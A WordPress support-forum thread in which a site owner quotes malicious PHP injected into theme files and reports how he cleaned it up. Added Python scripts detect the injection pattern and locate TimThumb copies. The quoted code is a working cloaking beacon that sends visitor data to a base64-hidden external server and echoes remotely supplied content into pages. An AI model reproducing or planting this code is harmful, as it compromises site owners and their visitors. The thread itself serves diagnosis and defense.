Title: Security Problem
Last modified: August 20, 2016

---

# Security Problem

 *  [giangel84](https://wordpress.org/support/users/giangel84/)
 * (@giangel84)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/)
 * Hi to all.
 * I hope that this thread is in the correct section; otherwise, please move it to
   the right place.
 * Recently I’ve encountered several security problems on my WordPress website.
 * It all started when a lot of spam was sent from my server (Contact Form 7
   3.0 exploit? even though Really Simple CAPTCHA is installed!)
 * Looking into FTP I found these issues:
 * All .htaccess files were modified by inserting some allow code into them.
 * Several randomly named folders were created; they were found in the wp-content
   directory.
 * All .php files named like “index”, “footer” and “main” were modified, and in
   them I found this PHP code:
 *     ```php
       <?php
       // Analyst notes are marked [note]; the other comments are the malware's own.
       // This code use for global bot statistic
       // [note] Cloaking: the beacon only fires for visitors whose User-Agent does NOT
       // look like a search engine or a common browser, so crawlers see a clean page.
       $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
       $stCurlHandle = NULL;
       $stCurlLink = "";
       if ((strstr($sUserAgent, 'google') == false)
           && (strstr($sUserAgent, 'yahoo') == false)
           && (strstr($sUserAgent, 'baidu') == false)
           && (strstr($sUserAgent, 'msn') == false)
           && (strstr($sUserAgent, 'opera') == false)
           && (strstr($sUserAgent, 'chrome') == false)
           && (strstr($sUserAgent, 'bing') == false)
           && (strstr($sUserAgent, 'safari') == false)
           && (strstr($sUserAgent, 'bot') == false)) // Bot comes
       {
           if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create  bot analitics
               // [note] The base64 literal decodes to http://rebotstat.com/botstat/stat.php;
               // visitor IP, User-Agent, host name and request path are sent to that server.
               $stCurlLink = base64_decode('aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==')
                   . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                   . '&useragent=' . urlencode($sUserAgent)
                   . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                   . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                   . '&check=' . isset($_GET['look']);
               $stCurlHandle = curl_init($stCurlLink);
           }
       }
       if ($stCurlHandle !== NULL) {
           curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
           $sResult = @curl_exec($stCurlHandle);
           // [note] Whatever the remote server answers is written into the page when
           // its first byte is "O": a remotely controlled content/script injection.
           if ($sResult[0] == "O") {
               $sResult[0] = " ";
               echo $sResult; // Statistic code end
           }
           curl_close($stCurlHandle);
       }
       ?>
       ```
   
 * So I’m sure that there aren’t any plugins that could be the cause. I’m also sure
   that all file and folder permissions are set correctly.
 * I don’t know if these problems might be caused by a security issue at my hosting
   provider or by a missing .htaccess configuration.
 * Can I lock out external access in any way in order to fix the above issues?
 * Thanks a lot, and sorry for my English!
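
The snippet quoted in the post is a cloaking beacon: it skips any visitor whose User-Agent mentions a search engine or a browser name, sends the visitor's IP, User-Agent, host and path to a base64-hidden URL, and prints whatever the remote server answers when the reply starts with "O". The script below is an added example, not code from the thread, that hunts for that combination across a site tree: a file is flagged only when the User-Agent cloaking check appears next to at least one other indicator, and any base64 literal that decodes to printable text (a URL) is reported so it can be blocked and searched for elsewhere. The sample site, the stand-in beacon URL `http://example.invalid/stat.php` and the `legit` plugin are constructed for the demonstration.

```python
"""Triage scanner for the cloaking beacon pattern quoted above (added example)."""
import base64
import os
import re
import tempfile

# Indicators drawn from the posted snippet. Each one also occurs in legitimate
# code (plugins call curl_init and base64_decode all the time), so a file is
# flagged only when the User-Agent cloaking check appears with another indicator.
INDICATORS = {
    # lowercased User-Agent, the input to the search-engine exclusion list
    "ua_cloaking": re.compile(
        r"strtolower\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    # a base64 literal long enough to hide a URL, fed straight to base64_decode
    "b64_literal": re.compile(
        r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]\s*\)"),
    "curl_beacon": re.compile(r"curl_init\s*\("),
    "echo_result": re.compile(r"echo\s+\$sResult\b"),  # remote reply written into the page
}
SCAN_SUFFIXES = (".php", ".html", ".htm")

def classify(source):
    """Return the names of the indicators present in one file's source text."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def is_suspicious(hits):
    """Cloaking on the User-Agent is the discriminating signal; require it plus one more."""
    return "ua_cloaking" in hits and len(hits) >= 2

def decode_literals(source):
    """Decode the base64 literals in `source` that turn out to be printable ASCII (URLs)."""
    decoded = []
    for match in INDICATORS["b64_literal"].finditer(source):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # binary payloads (images etc.) are not what we are after
        if text.isprintable():
            decoded.append(text)
    return decoded

def scan_tree(root):
    """Walk a site tree; map each flagged relative path to its indicators and decoded URLs."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            hits = classify(source)
            if is_suspicious(hits):
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = {"indicators": hits, "decoded": decode_literals(source)}
    return findings

# --- constructed sample site (not files from the thread) -------------------------
BEACON_URL = "http://example.invalid/stat.php"  # stand-in for the real beacon URL
INFECTED_INDEX = """<?php
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strstr($sUserAgent, 'google') == false && strstr($sUserAgent, 'bot') == false) {
    $stCurlHandle = curl_init(base64_decode('__B64__') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']));
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0] == "O") { $sResult[0] = " "; echo $sResult; }
}
?>
"""
CLEAN_FOOTER = "<?php wp_footer(); ?>\n</body></html>\n"
# legitimate plugin code: uses curl and a base64 image, but no User-Agent cloaking
LEGIT_PLUGIN = "<?php\n$ch = curl_init('https://api.example.invalid/v1/ping');\n$icon = base64_decode('__PNG__');\n"

def build_sample_tree():
    """Write the constructed files into a temp dir laid out like a WordPress site; return its path."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    url_b64 = base64.b64encode(BEACON_URL.encode()).decode()
    png_b64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(24)).decode()
    files = {
        "wp-content/themes/sample/index.php": INFECTED_INDEX.replace("__B64__", url_b64),
        "wp-content/themes/sample/footer.php": CLEAN_FOOTER,
        "wp-content/plugins/legit/api.php": LEGIT_PLUGIN.replace("__PNG__", png_b64),
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, info in sorted(scan_tree(build_sample_tree()).items()):
        print(rel, info["indicators"], info["decoded"])
```

On a real install call `scan_tree("/path/to/wordpress")`. The decoded URL is what you block at the egress firewall and grep for in the rest of the tree, and every flagged file belongs on the list of files to restore from a clean copy rather than edit by hand, since the post reports the same code in core, plugin and theme files.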

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [Japh](https://wordpress.org/support/users/japh/)
 * (@japh)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312373)
 * Hello, can you please clarify what version of WordPress you are running? Is it
   the latest (3.2.1)?
 * Also, does your theme (or possibly any of your plugins) use the TimThumb script?
   You can find some information on the recent exploit of the previous TimThumb 
   version and how to fix it here: [http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/](http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/)
 * I hope that helps you.
 *  Thread Starter [giangel84](https://wordpress.org/support/users/giangel84/)
 * (@giangel84)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312670)
 * Yes, I’m using the latest (3.2.1) WordPress version.
 * I think I’ve found the problem, and it has been fixed.
 * These are the steps I executed:
 * 1) First I looked for any plugin that could include the “timthumb.php” file function,
   like “Logo Management” and “WP-Mobile-Detector”. These were disabled and deleted.
 * 2) Reinstalled the original WordPress files: Dashboard->Updates->Reinstall WordPress
   3.2.1.
 * 3) Reinstalled the original plugins that had been modified by the script.
 * 4) Cleaned the theme’s files by deleting the added PHP script code (see the script
   in the post above).
 * 5) Scanned the website with the Sucuri online check tool ([http://sitecheck.sucuri.net/scanner](http://sitecheck.sucuri.net/scanner))
 * 6) Changed the FTP password.
 * End.
 * Thank you very much, Japh, for your advice about “timthumb”. It was really useful.
 *  [Japh](https://wordpress.org/support/users/japh/)
 * (@japh)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312671)
 * I’m really pleased to hear you got it all fixed! Glad I could point you in the
   right direction 🙂
 *  Thread Starter [giangel84](https://wordpress.org/support/users/giangel84/)
 * (@giangel84)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312672)
 * Yes Japh.
 * Thank you so much again! 🙂
 * This is the malware that I encountered in my case (to help other users):
   
   [http://sucuri.net/malware/malware-entry-mwjs159](http://sucuri.net/malware/malware-entry-mwjs159)
 * Bye!
 *  [Kapi31](https://wordpress.org/support/users/kapi31/)
 * (@kapi31)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312744)
 * Hello!
 * Unfortunately I’m encountering the same issue… and not on 1 site, but 5, 4 of
   which are in WordPress.
 * I have local copies of my websites, so I believe that I will only have to delete
   and replace all the files with my saved copies… even if it will be a huge amount
   of work. Correct?
 * I have already changed my FTP password.
 * BUT I have a question… Do you know if the virus changes the permissions on the
   different directories and files?
 * I have noticed that the virus has also added code to index.html and other HTML
   files at the root of some directories…
 * Another question… My antivirus hasn’t found anything on my machine. When I
   noticed an issue… I think it was a trap… I immediately restored the system
   configuration to a previous date. But should I reinstall my whole system?
 * Many thanks for your help.
 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [14 years, 2 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312745)
 * **[@kapi31](https://wordpress.org/support/users/kapi31/)**, Please start your
   own thread.
 *  [Kapi31](https://wordpress.org/support/users/kapi31/)
 * (@kapi31)
 * [14 years, 2 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312746)
 * Sure. Done. Thx.
 *  [Terry J](https://wordpress.org/support/users/texasbiz/)
 * (@texasbiz)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312769)
 * Great information. Same boat.
 * Could you tell me the easiest way to “look for any plugin that can include the
   “timthumb.php” file function”?
 * Is there an easy way to find these types of plugins?
 * Thanks in advance.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312770)
 * Please post a new topic.
 *  [Terry J](https://wordpress.org/support/users/texasbiz/)
 * (@texasbiz)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312771)
 * Sorry, I did not think of posting a new topic / starting a new thread, since “giangel84”
   had already stated here:
 * 1) First I looked for any plugin that could include the “timthumb.php” file function,
   like “Logo Management” and “WP-Mobile-Detector”. These were disabled and deleted.
 * Seems like extra clutter to me, but you’re the boss.
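
For giangel84's step 1 and Terry J's question about the easiest way to find plugins that include timthumb.php, the script below is an added example, not code from the thread or from the TimThumb project. It walks a site tree and reports, grouped by plugin or theme, every copy of the script (by file name, or by its banner when it was renamed to thumb.php) together with the version the copy declares, plus the files that include it or call it by URL, so the output is a review list rather than a pile of grep hits. The `define ('VERSION', ...)` form, the thumb.php rename, the sample tree and the version string `1.32` are assumptions constructed for the demonstration; the plugin name is one giangel84 mentioned.

```python
"""Locate TimThumb copies and the plugins/themes that use them (added example)."""
import os
import re
import tempfile

# Shipped timthumb.php files declare their version as define ('VERSION', 'x.y');
# that form, and the common rename to thumb.php, are assumptions of this example.
VERSION_RX = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)")
TIMTHUMB_BANNER = re.compile(r"\bTimThumb\b")
# an include/require of the script, or a URL that calls it (<img src=".../timthumb.php?src=...">)
INCLUDE_RX = re.compile(r"\b(?:require|include)(?:_once)?\b[^;]*timthumb\.php", re.I)
URL_RX = re.compile(r"timthumb\.php\?", re.I)

def component_of(rel):
    """Map wp-content/plugins/foo/... or wp-content/themes/bar/... to 'plugins/foo' / 'themes/bar'."""
    parts = rel.split("/")
    if len(parts) >= 3 and parts[0] == "wp-content" and parts[1] in ("plugins", "themes"):
        return f"{parts[1]}/{parts[2]}"
    return parts[0]  # anything else is reported under its top-level directory

def is_timthumb_copy(name, source):
    """A file named timthumb.php, or a renamed copy that still carries the TimThumb banner."""
    lower = name.lower()
    return lower == "timthumb.php" or (lower == "thumb.php" and TIMTHUMB_BANNER.search(source) is not None)

def find_timthumb(root):
    """Return {component: {'copies': [(relpath, version)], 'references': [relpath]}}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            entry = report.setdefault(component_of(rel), {"copies": [], "references": []})
            if is_timthumb_copy(name, source):
                m = VERSION_RX.search(source)
                entry["copies"].append((rel, m.group(1) if m else "unknown"))
            elif INCLUDE_RX.search(source) or URL_RX.search(source):
                entry["references"].append(rel)
    # keep only the components that have something to review
    return {c: e for c, e in report.items() if e["copies"] or e["references"]}

# --- constructed sample tree; the plugin name is the one giangel84 mentioned ---
SAMPLE_FILES = {
    "wp-content/plugins/logo-management/timthumb.php":
        "<?php\n/* TimThumb script (constructed stub) */\ndefine ('VERSION', '1.32');  // constructed\n",
    "wp-content/plugins/logo-management/logo-management.php":
        "<img src=\"<?php echo plugin_dir_url(__FILE__); ?>timthumb.php?src=logo.png&w=200\">\n",
    "wp-content/themes/sample-theme/thumb.php":
        "<?php\n/* TimThumb script (constructed stub, renamed, no VERSION line) */\n",
    "wp-content/themes/sample-theme/functions.php":
        "<?php\nrequire_once dirname(__FILE__) . '/thumb.php';\n",
    "wp-content/plugins/clean-plugin/clean-plugin.php":
        "<?php\n// nothing image-related here\n",
}

def build_sample_tree():
    """Write SAMPLE_FILES under a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="wp-timthumb-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for component, entry in sorted(find_timthumb(build_sample_tree()).items()):
        print(component)
        for rel, version in entry["copies"]:
            print("  copy      ", rel, "version", version)
        for rel in entry["references"]:
            print("  reference ", rel)
```

The one-line equivalent on the server is `grep -rli timthumb wp-content/`; the script only adds the grouping and the declared version, so each copy can be compared against the fixed release described in the post Japh linked, and a renamed copy without the canonical file name is still caught by its banner (a theme that includes `thumb.php` shows up through the copy, not through the include).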


The topic ‘Security Problem’ is closed to new replies.

## Tags

 * [htaccess](https://wordpress.org/support/topic-tag/htaccess/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 10 replies
 * 6 participants
 * Last reply from: [Terry J](https://wordpress.org/support/users/texasbiz/)
 * Last activity: [13 years, 9 months ago](https://wordpress.org/support/topic/security-problem-8/#post-2312771)
 * Status: not resolved

